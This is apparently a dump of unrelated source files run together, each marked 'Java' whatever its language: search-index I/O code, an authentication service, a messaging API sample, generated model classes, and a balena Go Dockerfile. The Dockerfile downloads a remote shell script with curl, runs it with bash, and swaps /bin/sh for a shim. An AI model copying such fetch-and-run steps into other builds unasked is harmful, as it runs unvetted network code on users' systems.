        // 2-byte sequence: 110xxxxx 10xxxxxx
        buffer[i] = (char) (((b & 0x1F) << 6) | (readByte() & 0x3F));
      } else
        // 3-byte sequence: 1110xxxx 10xxxxxx 10xxxxxx
        buffer[i] = (char) (((b & 0x0F) << 12) | ((readByte() & 0x3F) << 6) | (readByte() & 0x3F));
    }
  }

  /**
   * Expert
   *
   * Similar to {@link #readChars(char[], int, int)} but does not do any conversion operations on the bytes it is reading in.  It still
   * has to invoke {@link #readByte()} just as {@link #readChars(char[], int, int)} does, but it does not need a buffer to store anything
   * and it does not have to do any of the bitwise operations, since we don't actually care what is in the byte except to determine
   * how many more bytes to read
   * @param length The number of chars to read
   * @deprecated this method operates on old "modified utf8" encoded
   *             strings
   */
  public void skipChars(int length) throws IOException {
    for (int i = 0; i < length; i++) {
      byte b = readByte();
      if ((b & 0x80) == 0) {
        // do nothing, we only need one byte
      } else if ((b & 0xE0) != 0xE0) {
        readByte(); // read an additional byte
      } else {
        // read two additional bytes.
        readByte();
        readByte();
      }
    }
  }

  /** Closes the stream to further operations. */
  public abstract void close() throws IOException;

  /** Returns the current position in this file, where the next read will
   * occur.
   * @see #seek(long)
   */
  public abstract long getFilePointer();

  /** Sets current position in this file, where the next read will occur.
   * @see #getFilePointer()
   */
  public abstract void seek(long pos) throws IOException;

  /** The number of bytes in the file. */
  public abstract long length();

  /** Returns a clone of this stream.
   *
   * <p>Clones of a stream access the same data, and are positioned at the same
   * point as the stream they were cloned from.
   *
   * <p>Expert: Subclasses must ensure that clones may be positioned at
   * different points in the input from each other and from the stream they
   * were cloned from.
   */
  @Override
  public Object clone() {
    IndexInput clone = null;
    try {
      clone = (IndexInput) super.clone();
      // CloneNotSupportedException cannot occur here: this class
      // implements Cloneable, so the swallowed catch is unreachable.
    } catch (CloneNotSupportedException e) {}
    return clone;
  }

  /** Reads a count-prefixed sequence of string key/value pairs into a map.
   * Format: int count, then count (readString key, readString value) pairs.
   */
  public Map<String, String> readStringStringMap() throws IOException {
    final Map<String, String> map = new HashMap<String, String>();
    final int count = readInt();
    for (int i = 0; i < count; i++) {
      final String key = readString();
      final String val = readString();
      map.put(key, val);
    }
    return map;
  }

}
Java
# ExportHistoryResponse ## Properties Name | Type | Description | Notes ------------ | ------------- | ------------- | ------------- **count** | **Long** | | [optional] **data** | [**ExportDataArray**](ExportDataArray.md) | | [optional] **offset** | **Long** | | [optional] **total** | **Long** | | [optional]
Java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_31) on Mon Oct 01 00:28:16 PDT 2012 --> <TITLE> org.apache.hadoop.metrics.file (Hadoop 1.0.3.16 API) </TITLE> <META NAME="date" CONTENT="2012-10-01"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../../org/apache/hadoop/metrics/file/package-summary.html" target="classFrame">org.apache.hadoop.metrics.file</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="FileContext.html" title="class in org.apache.hadoop.metrics.file" target="classFrame">FileContext</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
Java
## Copyright 2022 Google LLC
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
##     https://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.

"""Sends a text message to the user with a suggested action to dial a phone number.

Read more: https://developers.google.com/business-communications/business-messages/guides/how-to/message/send?hl=en#dial_action

This code is based on the https://github.com/google-business-communications/python-businessmessages
Python Business Messages client library.
"""

import uuid

from businessmessages import businessmessages_v1_client as bm_client
from businessmessages.businessmessages_v1_messages import BusinessmessagesConversationsMessagesCreateRequest
from businessmessages.businessmessages_v1_messages import BusinessMessagesDialAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesMessage
from businessmessages.businessmessages_v1_messages import BusinessMessagesRepresentative
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestedAction
from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestion
from oauth2client.service_account import ServiceAccountCredentials

# Edit the values below:
path_to_service_account_key = './service_account_key.json'
conversation_id = 'EDIT_HERE'

# Authenticate against the Business Messages API with a service account key.
credentials = ServiceAccountCredentials.from_json_keyfile_name(
    path_to_service_account_key,
    scopes=['https://www.googleapis.com/auth/businessmessages'])

client = bm_client.BusinessmessagesV1(credentials=credentials)

# Choose which representative type sends the message ('BOT' or human agent).
representative_type_as_string = 'BOT'

if representative_type_as_string == 'BOT':
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.BOT
else:
  representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.HUMAN

# Create a text message with a dial action and fallback text.
# messageId must be unique per message; fallback is shown when the
# client cannot render the suggestion.
message = BusinessMessagesMessage(
    messageId=str(uuid.uuid4().int),
    representative=BusinessMessagesRepresentative(
        representativeType=representative_type
    ),
    text='Contact support for help with this issue.',
    fallback='Give us a call at +12223334444.',
    suggestions=[
        BusinessMessagesSuggestion(
            action=BusinessMessagesSuggestedAction(
                text='Call support',
                postbackData='call-support',
                dialAction=BusinessMessagesDialAction(
                    phoneNumber='+12223334444'))
        ),
    ])

# Create the message request, addressed to an existing conversation.
create_request = BusinessmessagesConversationsMessagesCreateRequest(
    businessMessagesMessage=message,
    parent='conversations/' + conversation_id)

# Send the message
bm_client.BusinessmessagesV1.ConversationsMessagesService(
    client=client).Create(request=create_request)
Java
<?php /** * Skeleton subclass for representing a row from the 'data2010' table. * * * * You should add additional methods to this class to meet the * application requirements. This class will only be generated as * long as it does not already exist in the output directory. * * @package propel.generator.fbapp */ class Data2010 extends BaseData2010 { }
Java
// // This file was generated by the JavaTM Architecture for XML Binding(JAXB) Reference Implementation, v2.2.11 // See <a href="http://java.sun.com/xml/jaxb">http://java.sun.com/xml/jaxb</a> // Any modifications to this file will be lost upon recompilation of the source schema. // Generated on: 2015.08.19 at 01:05:06 PM PDT // package com.google.api.ads.adwords.lib.jaxb.v201509; import javax.xml.bind.annotation.XmlEnum; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for SortOrder. * * <p>The following schema fragment specifies the expected content contained within this class. * <p> * <pre> * &lt;simpleType name="SortOrder"&gt; * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}string"&gt; * &lt;enumeration value="ASCENDING"/&gt; * &lt;enumeration value="DESCENDING"/&gt; * &lt;/restriction&gt; * &lt;/simpleType&gt; * </pre> * */ @XmlType(name = "SortOrder") @XmlEnum public enum SortOrder { ASCENDING, DESCENDING; public String value() { return name(); } public static SortOrder fromValue(String v) { return valueOf(v); } }
Java
---
layout: post
title: Some sites to use as placeholders for your site
date: 2016-10-10
categories: front-end skills
tags: front-end skills
---

* content
{:toc}
Java
package ru.job4j; import org.junit.Test; import java.util.*; /** * Класс для тестирования. * @author agavrikov * @since 13.07.2017 * @version 1 */ public class TestTimeCollectionTest { /** * Тестирование метода добавления. */ @Test public void add() { TestTimeCollection methods = new TestTimeCollection(); List<String> linkedList = new LinkedList<String>(); long timeStart = new Date().getTime(); long timeEnd = methods.add(linkedList, 1000000); System.out.println(timeEnd - timeStart); List<String> arrayList = new ArrayList<String>(); timeStart = new Date().getTime(); timeEnd = methods.add(arrayList, 1000000); System.out.println(timeEnd - timeStart); Set<String> treeSet = new TreeSet<String>(); timeStart = new Date().getTime(); timeEnd = methods.add(treeSet, 1000000); System.out.println(timeEnd - timeStart); } /** * Тестирование метода удаления. */ @Test public void delete() { TestTimeCollection methods = new TestTimeCollection(); List<String> linkedList = new LinkedList<String>(); methods.add(linkedList, 100000); long timeStart = new Date().getTime(); long timeEnd = methods.delete(linkedList, 10000); System.out.println(timeEnd - timeStart); List<String> arrayList = new ArrayList<String>(); methods.add(arrayList, 100000); timeStart = new Date().getTime(); timeEnd = methods.delete(arrayList, 10000); System.out.println(timeEnd - timeStart); Set<String> treeSet = new TreeSet<String>(); methods.add(treeSet, 100000); timeStart = new Date().getTime(); timeEnd = methods.delete(treeSet, 10000); System.out.println(timeEnd - timeStart); } }
Java
package tinymonkeys.vue; import java.awt.Color; import java.awt.Graphics; import javax.swing.JPanel; /** * Classe du panneau de la carte. * * @version 1.0 * @author Camille Constant * */ public class VueCarte extends JPanel { /** * UID auto-généré. */ private static final long serialVersionUID = 4884966649331011259L; /** * Rapport entre la taille de la carte et la taille de l'écran. */ private static final double RAPPORT_ECRAN = 0.75; /** * Constante permettant de placer un objet à la moitié de l'écran. */ private static final int DIVISEUR_MILIEU = 2; /** * Constante permettant de placer un objet au quart de l'écran. */ private static final int DIVISEUR_QUART = 4; /** * Constante indiquant la couleur des cases représentant la mer. */ private static final Color OCEAN = new Color(0, 120, 220); /** * Taille de la case en nombre de pixels. */ private int tailleCase; /** * La coordonnee en abscisse du coin supérieur gauche de la grille. */ private int xGrille; /** * La coordonnee en ordonnée du coin supérieur gauche de la grille. */ private int yGrille; /** * Largeur de l'ecran en nombre de pixels. */ private final int largeurEcran; /** * Hauteur de l'ecran en nombre de pixels. */ private final int hauteurEcran; /** * Largeur de la grille en nombre de cases. */ private int largeurGrille; /** * Hauteur de la grille en nombre de cases. */ private int hauteurGrille; /** * La carte. */ private int[][] carte; /** * Constructeur de la vue de la carte. * * @param largeurEcran largeur de l'ecran en nombre de pixels. * @param hauteurEcran hauteur de l'ecran en nombre de pixels. 
* @param carte la carte a dessiner */ public VueCarte(int largeurEcran, int hauteurEcran, int[][] carte) { super(); this.largeurEcran = largeurEcran; this.hauteurEcran = hauteurEcran; this.largeurGrille = carte.length; this.hauteurGrille = carte[0].length; this.copieCarte(carte); this.placementGrille(); this.setBounds(this.xGrille, this.yGrille, this.largeurGrille * this.tailleCase + 1, this.hauteurGrille * this.tailleCase + 1); this.setOpaque(false); } /** * Dessine la carte de l'ile avec la grille. * * @param g le graphique dans lequel dessiner. */ public final void paintComponent(Graphics g) { super.paintComponent(g); this.dessineIle(g); this.dessineGrille(g); } /** * Place la carte au centre de l'écran. */ private void placementGrille() { final int diviseurLargeur; final int diviseurHauteur; final int largeurCase = (int) ((this.largeurEcran * RAPPORT_ECRAN) / this.largeurGrille); final int hauteurCase = (int) ((this.hauteurEcran * RAPPORT_ECRAN) / this.hauteurGrille); if (largeurCase < hauteurCase) { this.tailleCase = largeurCase; diviseurLargeur = DIVISEUR_QUART; diviseurHauteur = DIVISEUR_MILIEU; } else { this.tailleCase = hauteurCase; diviseurLargeur = DIVISEUR_MILIEU; diviseurHauteur = DIVISEUR_QUART; } this.xGrille = (int) ((this.largeurEcran - (this.tailleCase * this.largeurGrille)) / diviseurLargeur); this.yGrille = (int) ((this.hauteurEcran - (this.tailleCase * this.hauteurGrille)) / diviseurHauteur); } /** * Dessine la grille. * * @param g le graphique dans lequel dessiner. */ public void dessineGrille(Graphics g) { // La grille apparait en noir. g.setColor(Color.BLACK); // colonnes for (int i = 0; i <= (this.tailleCase * this.largeurGrille); i += this.tailleCase) { g.drawLine(i, 0, i, this.tailleCase * this.hauteurGrille); } // lignes for (int j = 0; j <= this.tailleCase * this.hauteurGrille; j += this.tailleCase) { g.drawLine(0, j, this.tailleCase * this.largeurGrille, j); } } /** * Dessine l'ile. * * @param g le graphique dans lequel dessiner. 
*/ public final void dessineIle(Graphics g) { int i = -1; while (++i < this.largeurGrille) { int j = -1; while (++j < this.hauteurGrille) { // Si la case est de type mer. if (this.carte[i][j] == 0) { g.setColor(OCEAN); g.fillRect(i * this.tailleCase, j * this.tailleCase, this.tailleCase, this.tailleCase); } // Coloration inutile pour les cases terre. } } } /** * Modifie la carte de l'ile. * * @param carte la nouvelle carte. */ public final void setVueCarte(int[][] carte) { this.largeurGrille = carte.length; this.hauteurGrille = carte[0].length; this.copieCarte(carte); this.placementGrille(); this.setBounds(this.xGrille, this.yGrille, this.largeurGrille * this.tailleCase + 1, this.hauteurGrille * this.tailleCase + 1); this.setOpaque(false); } /** * Accesseur en lecture de la taille d'une case. * * @return la taille d'une case. */ public final int getTailleCase() { return this.tailleCase; } /** * Accesseur en lecture de l'abscisse de la grille. * * @return l'abscisse de la grille. */ public final int getXGrille() { return this.xGrille; } /** * Accesseur en lecture de l'ordonnee de la grille. * * @return l'ordonnee de la grille. */ public final int getYGrille() { return this.yGrille; } /** * Recopie de la carte dans l'attribut carte. * * @param carte la carte a copier. */ private void copieCarte(int[][] carte) { this.carte = new int[carte.length][carte[0].length]; int i = -1; while (++i < carte.length) { int j = -1; while(++j < carte[0].length) { this.carte[i][j] = carte[i][j]; } } } }
Java
package org.sagebionetworks.auth.services;

import org.sagebionetworks.repo.manager.AuthenticationManager;
import org.sagebionetworks.repo.manager.MessageManager;
import org.sagebionetworks.repo.manager.UserManager;
import org.sagebionetworks.repo.manager.authentication.PersonalAccessTokenManager;
import org.sagebionetworks.repo.manager.oauth.AliasAndType;
import org.sagebionetworks.repo.manager.oauth.OAuthManager;
import org.sagebionetworks.repo.manager.oauth.OpenIDConnectManager;
import org.sagebionetworks.repo.model.AuthorizationUtils;
import org.sagebionetworks.repo.model.UnauthorizedException;
import org.sagebionetworks.repo.model.UserInfo;
import org.sagebionetworks.repo.model.auth.AccessToken;
import org.sagebionetworks.repo.model.auth.AccessTokenGenerationRequest;
import org.sagebionetworks.repo.model.auth.AccessTokenGenerationResponse;
import org.sagebionetworks.repo.model.auth.AccessTokenRecord;
import org.sagebionetworks.repo.model.auth.AccessTokenRecordList;
import org.sagebionetworks.repo.model.auth.AuthenticatedOn;
import org.sagebionetworks.repo.model.auth.ChangePasswordInterface;
import org.sagebionetworks.repo.model.auth.LoginRequest;
import org.sagebionetworks.repo.model.auth.LoginResponse;
import org.sagebionetworks.repo.model.auth.NewUser;
import org.sagebionetworks.repo.model.auth.PasswordResetSignedToken;
import org.sagebionetworks.repo.model.oauth.OAuthAccountCreationRequest;
import org.sagebionetworks.repo.model.oauth.OAuthProvider;
import org.sagebionetworks.repo.model.oauth.OAuthUrlRequest;
import org.sagebionetworks.repo.model.oauth.OAuthUrlResponse;
import org.sagebionetworks.repo.model.oauth.OAuthValidationRequest;
import org.sagebionetworks.repo.model.oauth.ProvidedUserInfo;
import org.sagebionetworks.repo.model.principal.AliasType;
import org.sagebionetworks.repo.model.principal.PrincipalAlias;
import org.sagebionetworks.repo.transactions.WriteTransaction;
import org.sagebionetworks.repo.web.NotFoundException;
import org.sagebionetworks.util.ValidateArgument;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

/**
 * Thin service facade over the authentication manager layer. Each method
 * delegates to one or more managers (user lookup, credential handling,
 * OAuth, personal access tokens) and adds transaction boundaries via
 * {@link WriteTransaction} where state is mutated.
 */
@Service
public class AuthenticationServiceImpl implements AuthenticationService {

	@Autowired
	private UserManager userManager;

	@Autowired
	private AuthenticationManager authManager;

	@Autowired
	private OAuthManager oauthManager;

	@Autowired
	private OpenIDConnectManager oidcManager;

	@Autowired
	private MessageManager messageManager;

	@Autowired
	private PersonalAccessTokenManager personalAccessTokenManager;

	/**
	 * Changes the user's password, then sends a confirmation email to the
	 * affected user (the manager returns the id of that user).
	 */
	@WriteTransaction
	@Override
	public void changePassword(ChangePasswordInterface request) throws NotFoundException {
		final long userId = authManager.changePassword(request);
		messageManager.sendPasswordChangeConfirmationEmail(userId);
	}

	/**
	 * Records the caller's acceptance of the terms of use. The caller is
	 * identified by validating the supplied access token; the subject of the
	 * token is parsed as the principal id.
	 */
	@Override
	@WriteTransaction
	public void signTermsOfUse(AccessToken accessToken) throws NotFoundException {
		ValidateArgument.required(accessToken, "Access token");
		ValidateArgument.required(accessToken.getAccessToken(), "Access token contents");
		Long principalId = Long.parseLong(oidcManager.validateAccessToken(accessToken.getAccessToken()));

		// Save the state of acceptance
		authManager.setTermsOfUseAcceptance(principalId, true);
	}

	@Override
	public String getSecretKey(Long principalId) throws NotFoundException {
		return authManager.getSecretKey(principalId);
	}

	/**
	 * "Deletes" the key by asking the manager to change it — presumably
	 * rotation invalidates the old key; confirm against
	 * AuthenticationManager.changeSecretKey.
	 */
	@Override
	@WriteTransaction
	public void deleteSecretKey(Long principalId) throws NotFoundException {
		authManager.changeSecretKey(principalId);
	}

	@Override
	public boolean hasUserAcceptedTermsOfUse(Long userId) throws NotFoundException {
		return authManager.hasUserAcceptedTermsOfUse(userId);
	}

	/**
	 * Sends a password-reset email for the given username/email. A missing
	 * account is deliberately silent (see catch below) so this endpoint
	 * cannot be used to probe which accounts exist.
	 */
	@Override
	public void sendPasswordResetEmail(String passwordResetUrlPrefix, String usernameOrEmail) {
		try {
			PrincipalAlias principalAlias = userManager.lookupUserByUsernameOrEmail(usernameOrEmail);
			PasswordResetSignedToken passwordRestToken = authManager.createPasswordResetToken(principalAlias.getPrincipalId());
			messageManager.sendNewPasswordResetEmail(passwordResetUrlPrefix, passwordRestToken, principalAlias);
		} catch (NotFoundException e) {
			// should not indicate that a email/user could not be found
		}
	}

	/** Builds the provider's authorization URL for the OAuth dance. */
	@Override
	public OAuthUrlResponse getOAuthAuthenticationUrl(OAuthUrlRequest request) {
		String url = oauthManager.getAuthorizationUrl(request.getProvider(), request.getRedirectUrl(), request.getState());
		OAuthUrlResponse response = new OAuthUrlResponse();
		response.setAuthorizationUrl(url);
		return response;
	}

	/**
	 * Exchanges an OAuth authorization code for the provider's user info and
	 * logs the matching existing account in. Requires the provider to supply
	 * a verified email, which is used to locate the principal; the password
	 * check is skipped because the provider already authenticated the user.
	 */
	@Override
	public LoginResponse validateOAuthAuthenticationCodeAndLogin(
			OAuthValidationRequest request, String tokenIssuer) throws NotFoundException {
		// Use the authentication code to lookup the user's information.
		ProvidedUserInfo providedInfo = oauthManager.validateUserWithProvider(
				request.getProvider(), request.getAuthenticationCode(), request.getRedirectUrl());
		if(providedInfo.getUsersVerifiedEmail() == null){
			throw new IllegalArgumentException("OAuthProvider: "+request.getProvider().name()+" did not provide a user email");
		}
		// This is the ID of the user within the provider's system.
		PrincipalAlias emailAlias = userManager.lookupUserByUsernameOrEmail(providedInfo.getUsersVerifiedEmail());
		// Return the user's access token
		return authManager.loginWithNoPasswordCheck(emailAlias.getPrincipalId(), tokenIssuer);
	}

	/**
	 * Creates a brand-new account from OAuth-provided user info (verified
	 * email required) and logs the new user in without a password check.
	 */
	@WriteTransaction
	public LoginResponse createAccountViaOauth(OAuthAccountCreationRequest request, String tokenIssuer) {
		// Use the authentication code to lookup the user's information.
		ProvidedUserInfo providedInfo = oauthManager.validateUserWithProvider(
				request.getProvider(), request.getAuthenticationCode(), request.getRedirectUrl());
		if(providedInfo.getUsersVerifiedEmail() == null){
			throw new IllegalArgumentException("OAuthProvider: "+request.getProvider().name()+" did not provide a user email");
		}
		// create account with the returned user info.
		NewUser newUser = new NewUser();
		newUser.setEmail(providedInfo.getUsersVerifiedEmail());
		newUser.setFirstName(providedInfo.getFirstName());
		newUser.setLastName(providedInfo.getLastName());
		newUser.setUserName(request.getUserName());
		long newPrincipalId = userManager.createUser(newUser);
		return authManager.loginWithNoPasswordCheck(newPrincipalId, tokenIssuer);
	}

	/**
	 * Binds an external (provider-side) identifier as an alias of the given
	 * authenticated user. Anonymous callers are rejected.
	 */
	@Override
	public PrincipalAlias bindExternalID(Long userId, OAuthValidationRequest validationRequest) {
		if (AuthorizationUtils.isUserAnonymous(userId)) throw new UnauthorizedException("User ID is required.");
		AliasAndType providersUserId = oauthManager.retrieveProvidersId(
				validationRequest.getProvider(),
				validationRequest.getAuthenticationCode(),
				validationRequest.getRedirectUrl());
		// now bind the ID to the user account
		return userManager.bindAlias(providersUserId.getAlias(), providersUserId.getType(), userId);
	}

	/** Removes a previously bound external alias from the user's account. */
	@Override
	public void unbindExternalID(Long userId, OAuthProvider provider, String aliasName) {
		if (AuthorizationUtils.isUserAnonymous(userId)) throw new UnauthorizedException("User ID is required.");
		AliasType aliasType = oauthManager.getAliasTypeForProvider(provider);
		userManager.unbindAlias(aliasName, aliasType, userId);
	}

	@Override
	public LoginResponse login(LoginRequest request, String tokenIssuer) {
		return authManager.login(request, tokenIssuer);
	}

	/** Returns when the given user last authenticated. */
	@Override
	public AuthenticatedOn getAuthenticatedOn(long userId) {
		UserInfo userInfo = userManager.getUserInfo(userId);
		return authManager.getAuthenticatedOn(userInfo);
	}

	/** Resolves a username or email to its principal alias. */
	@Override
	public PrincipalAlias lookupUserForAuthentication(String alias) {
		return userManager.lookupUserByUsernameOrEmail(alias);
	}

	/** Issues a new personal access token scoped per the request. */
	@Override
	public AccessTokenGenerationResponse createPersonalAccessToken(Long userId, String accessToken, AccessTokenGenerationRequest request, String oauthEndpoint) {
		UserInfo userInfo = userManager.getUserInfo(userId);
		return personalAccessTokenManager.issueToken(userInfo, accessToken, request, oauthEndpoint);
	}

	/** Pages through the user's personal access token records. */
	@Override
	public AccessTokenRecordList getPersonalAccessTokenRecords(Long userId, String nextPageToken) {
		UserInfo userInfo = userManager.getUserInfo(userId);
		return personalAccessTokenManager.getTokenRecords(userInfo, nextPageToken);
	}

	@Override
	public AccessTokenRecord getPersonalAccessTokenRecord(Long userId, Long tokenId) {
		UserInfo userInfo = userManager.getUserInfo(userId);
		return personalAccessTokenManager.getTokenRecord(userInfo, tokenId.toString());
	}

	@Override
	public void revokePersonalAccessToken(Long userId, Long tokenId) {
		UserInfo userInfo = userManager.getUserInfo(userId);
		personalAccessTokenManager.revokeToken(userInfo, tokenId.toString());
	}

}
Java
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; class CreateTypeBuysTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('type_buys', function(Blueprint $table) { $table->increments('id'); $table->string('description'); $table->timestamps(); $table->softDeletes(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::drop('type_buys'); } }
Java
# -*- coding: utf-8 -*- #!/usr/bin/env python # # Copyright 2014 BigML # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from world import world from bigml.api import HTTP_OK def i_get_the_project(step, resource): resource = world.api.get_project(resource) world.status = resource['code'] assert world.status == HTTP_OK world.project = resource['object']
Java
# AUTOGENERATED FILE
FROM balenalib/nanopi-neo-air-alpine:edge-run

ENV GO_VERSION 1.16

# set up nsswitch.conf for Go's "netgo" implementation
# - https://github.com/golang/go/blob/go1.9.1/src/net/conf.go#L194-L275
# - docker run --rm debian:stretch grep '^hosts:' /etc/nsswitch.conf
# NOTE: written as `[ -e ] || echo` so the RUN exits 0 when the file already
# exists; the original `[ ! -e ] && echo` form fails the build in that case.
RUN [ -e /etc/nsswitch.conf ] || echo 'hosts: files dns' > /etc/nsswitch.conf

# gcc for cgo
RUN apk add --no-cache git gcc ca-certificates

RUN fetchDeps='curl' \
	&& set -x \
	&& apk add --no-cache $fetchDeps \
	&& mkdir -p /usr/local/go \
	&& curl -SLO "http://resin-packages.s3.amazonaws.com/golang/v$GO_VERSION/go$GO_VERSION.linux-alpine-armv7hf.tar.gz" \
	&& echo "e5ec1504696d3484c0161fe3a0bbd37179c50cd4856b5d492a282a767e45a5ad  go$GO_VERSION.linux-alpine-armv7hf.tar.gz" | sha256sum -c - \
	&& tar -xzf "go$GO_VERSION.linux-alpine-armv7hf.tar.gz" -C /usr/local/go --strip-components=1 \
	&& rm -f go$GO_VERSION.linux-alpine-armv7hf.tar.gz

ENV GOROOT /usr/local/go
ENV GOPATH /go
ENV PATH $GOPATH/bin:/usr/local/go/bin:$PATH

RUN mkdir -p "$GOPATH/src" "$GOPATH/bin" && chmod -R 777 "$GOPATH"
WORKDIR $GOPATH

CMD ["echo","'No CMD command was set in Dockerfile! Details about CMD command could be found in Dockerfile Guide section in our Docs. Here's the link: https://balena.io/docs"]

RUN curl -SLO "https://raw.githubusercontent.com/balena-io-library/base-images/8accad6af708fca7271c5c65f18a86782e19f877/scripts/assets/tests/test-stack@golang.sh" \
	&& echo "Running test-stack@golang" \
	&& chmod +x test-stack@golang.sh \
	&& bash test-stack@golang.sh \
	&& rm -rf test-stack@golang.sh

# `;` (not `&&`) keeps this RUN succeeding when the directory already exists.
RUN [ ! -d /.balena/messages ] && mkdir -p /.balena/messages; echo $'Here are a few details about this Docker image (For more information please visit https://www.balena.io/docs/reference/base-images/base-images/): \nArchitecture: ARM v7 \nOS: Alpine Linux edge \nVariant: run variant \nDefault variable(s): UDEV=off \nThe following software stack is preinstalled: \nGo v1.16 \nExtra features: \n- Easy way to install packages with `install_packages <package-name>` command \n- Run anywhere with cross-build feature (for ARM only) \n- Keep the container idling with `balena-idle` command \n- Show base image details with `balena-info` command' > /.balena/messages/image-info

RUN echo $'#!/bin/bash\nbalena-info\nbusybox ln -sf /bin/busybox /bin/sh\n/bin/sh "$@"' > /bin/sh-shim \
	&& chmod +x /bin/sh-shim \
	&& ln -f /bin/sh /bin/sh.real \
	&& ln -f /bin/sh-shim /bin/sh
Java
# automate/server/user/views.py ################# #### imports #### ################# #from flask import render_template, Blueprint, url_for, \ # redirect, flash, request #from flask_login import login_user, logout_user, login_required #from automate.server import bcrypt, db #from automate.server import db #from automate.server.models import User #from automate.server.user.forms import LoginForm, RegisterForm ################ #### config #### ################ #user_blueprint = Blueprint('user', __name__,) ################ #### routes #### ################ #@user_blueprint.route('/register', methods=['GET', 'POST']) #def register(): # form = RegisterForm(request.form) # if form.validate_on_submit(): # user = User( # email=form.email.data, # password=form.password.data # ) # db.session.add(user) # db.session.commit() # # login_user(user) # # flash('Thank you for registering.', 'success') # return redirect(url_for("user.members")) # # return render_template('user/register.html', form=form) # # #@user_blueprint.route('/login', methods=['GET', 'POST']) #def login(): # form = LoginForm(request.form) # if form.validate_on_submit(): # user = User.query.filter_by(email=form.email.data).first() # if user: # #if user and bcrypt.check_password_hash( # # user.password, request.form['password']): # # login_user(user) # flash('You are logged in. Welcome!', 'success') # return redirect(url_for('user.members')) # else: # flash('Invalid email and/or password.', 'danger') # return render_template('user/login.html', form=form) # return render_template('user/login.html', title='Please Login', form=form) # # #@user_blueprint.route('/logout') #@login_required #def logout(): # logout_user() # flash('You were logged out. Bye!', 'success') # return redirect(url_for('main.home')) # # #@user_blueprint.route('/members') #@login_required #def members(): # return render_template('user/members.html') #
Java
<?php /** * PHP Version 5. * * @category Amazon * * @copyright Copyright 2009 Amazon Technologies, Inc. * * @see http://aws.amazon.com * * @license http://aws.amazon.com/apache2.0 Apache License, Version 2.0 * * @version 2009-01-01 */ /******************************************************************************* * Marketplace Web Service PHP5 Library * Generated: Thu May 07 13:07:36 PDT 2009 * */ /** * @see MarketplaceWebService_Model */ require_once 'MarketplaceWebService/Model.php'; /** * MarketplaceWebService_Model_ErrorResponse. * * Properties: * <ul> * * <li>Error: MarketplaceWebService_Model_Error</li> * <li>RequestId: string</li> * * </ul> */ class MarketplaceWebService_Model_ErrorResponse extends MarketplaceWebService_Model { /** * Construct new MarketplaceWebService_Model_ErrorResponse. * * @param mixed $data DOMElement or Associative Array to construct from. * * Valid properties: * <ul> * * <li>Error: MarketplaceWebService_Model_Error</li> * <li>RequestId: string</li> * * </ul> */ public function __construct($data = null) { $this->fields = array( 'Error' => array('FieldValue' => array(), 'FieldType' => 'MarketplaceWebService_Model_Error'), 'RequestId' => array('FieldValue' => null, 'FieldType' => 'string'), ); parent::__construct($data); } /** * Construct MarketplaceWebService_Model_ErrorResponse from XML string. * * @param string $xml XML string to construct from * * @return MarketplaceWebService_Model_ErrorResponse */ public static function fromXML($xml) { $dom = new DOMDocument(); $dom->loadXML($xml); $xpath = new DOMXPath($dom); $xpath->registerNamespace('a', 'http://mws.amazonaws.com/doc/2009-01-01/'); $response = $xpath->query('//a:ErrorResponse'); if ($response->length == 1) { return new self(($response->item(0))); } else { throw new Exception('Unable to construct MarketplaceWebService_Model_ErrorResponse from provided XML. Make sure that ErrorResponse is a root element'); } } /** * Gets the value of the Error. 
* * @return array of Error Error */ public function getError() { return $this->fields['Error']['FieldValue']; } /** * Sets the value of the Error. * * @param mixed Error or an array of Error Error * * @return $this instance */ public function setError($error) { if (!$this->_isNumericArray($error)) { $error = array($error); } $this->fields['Error']['FieldValue'] = $error; return $this; } /** * Sets single or multiple values of Error list via variable number of arguments. * For example, to set the list with two elements, simply pass two values as arguments to this function * <code>withError($error1, $error2)</code>. * * @param Error $errorArgs one or more Error * * @return MarketplaceWebService_Model_ErrorResponse instance */ public function withError($errorArgs) { foreach (func_get_args() as $error) { $this->fields['Error']['FieldValue'][] = $error; } return $this; } /** * Checks if Error list is non-empty. * * @return bool true if Error list is non-empty */ public function isSetError() { return count($this->fields['Error']['FieldValue']) > 0; } /** * Gets the value of the RequestId property. * * @return string RequestId */ public function getRequestId() { return $this->fields['RequestId']['FieldValue']; } /** * Sets the value of the RequestId property. * * @param string RequestId * * @return $this instance */ public function setRequestId($value) { $this->fields['RequestId']['FieldValue'] = $value; return $this; } /** * Sets the value of the RequestId and returns this instance. * * @param string $value RequestId * * 